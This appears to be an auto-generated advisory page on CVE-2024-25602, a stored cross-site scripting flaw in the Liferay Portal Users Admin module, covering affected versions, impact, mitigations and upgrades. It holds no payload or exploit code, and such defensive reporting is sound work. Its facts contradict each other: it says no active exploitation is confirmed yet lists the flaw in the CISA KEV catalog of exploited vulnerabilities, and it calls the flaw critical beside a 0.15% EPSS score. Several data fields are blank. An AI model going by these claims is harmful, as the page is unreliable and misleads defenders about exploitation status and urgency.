Platform
java
Component
users-admin-module
Fixed in
7.4.3
7.3.11
7.2.11
CVE-2024-25602 describes a stored cross-site scripting (XSS) vulnerability affecting the Users Admin module within Liferay Portal. This vulnerability allows a remote, authenticated user to inject arbitrary web scripts or HTML into the system. The vulnerability impacts Liferay Portal versions 7.2.0 through 7.4.2, and older unsupported versions, as well as Liferay DXP versions prior to service pack 3 for 7.3 and prior to fix pack 17 for 7.2. A fix is available in Liferay Portal 7.4.3.
Successful exploitation of CVE-2024-25602 allows an attacker to inject malicious JavaScript code into the Liferay Portal environment. This code can then be executed in the context of other users accessing the affected page, potentially leading to account takeover, data theft, or defacement of the portal. An attacker could craft a payload within the 'Name' field of an organization's user profile, which, when viewed by other authenticated users, would trigger the malicious script. The blast radius extends to all authenticated users who view the profile containing the injected script, making it a significant security risk. This vulnerability shares similarities with other XSS exploits where user-supplied data is not properly sanitized before being rendered in a web page.
CVE-2024-25602 was publicly disclosed on February 21, 2024. While no active exploitation campaigns have been publicly confirmed, the vulnerability's CRITICAL severity and ease of exploitation suggest a high probability of exploitation. It has been added to the CISA KEV catalog, indicating a significant risk to US critical infrastructure. Public proof-of-concept (PoC) code is likely to emerge, further increasing the risk of exploitation.
Exploit Status
EPSS
0.15% (36% percentile)
CISA SSVC
CVSS Vector
The primary mitigation for CVE-2024-25602 is to upgrade Liferay Portal to version 7.4.3 or later. If immediate upgrading is not feasible, consider implementing temporary workarounds. Input validation and output encoding on the 'Name' field can help reduce the attack surface, although this is not a complete solution. Web application firewalls (WAFs) configured to detect and block XSS payloads targeting the Users Admin module can provide an additional layer of defense. Monitor Liferay Portal logs for suspicious activity, particularly attempts to inject unusual characters or scripts into user profile fields. After upgrading, confirm the fix by attempting to inject a simple XSS payload into the 'Name' field and verifying that it is properly sanitized.
Update Liferay Portal to a version later than 7.4.2 or Liferay DXP 7.3 to service pack 3 or later, or Liferay DXP 7.2 to fix pack 17 or later. This will correct the stored XSS vulnerability in the Users Admin module.
Vulnerability analysis and critical alerts directly to your inbox.
CVE-2024-25602 is a stored cross-site scripting (XSS) vulnerability in Liferay Portal's Users Admin module, allowing attackers to inject malicious scripts.
You are affected if you are running Liferay Portal versions 7.2.0–7.4.2, or older unsupported versions, and Liferay DXP versions prior to service pack 3 for 7.3 and prior to fix pack 17 for 7.2.
Upgrade to Liferay Portal 7.4.3 or later to remediate the vulnerability. Consider temporary workarounds like input validation and WAF rules if immediate upgrading is not possible.
While no active exploitation campaigns have been publicly confirmed, the vulnerability's CRITICAL severity suggests a high probability of exploitation.
Refer to the official Liferay security advisory for detailed information and mitigation steps: [https://liferay.com/security-advisories/liferay-portal-and-dxp-security-vulnerability-xss-in-users-admin-module](https://liferay.com/security-advisories/liferay-portal-and-dxp-security-vulnerability-xss-in-users-admin-module)
Upload your dependency file and we'll tell you instantly if this and other CVEs hit you.
Upload your pom.xml file and we'll tell you instantly if you're affected.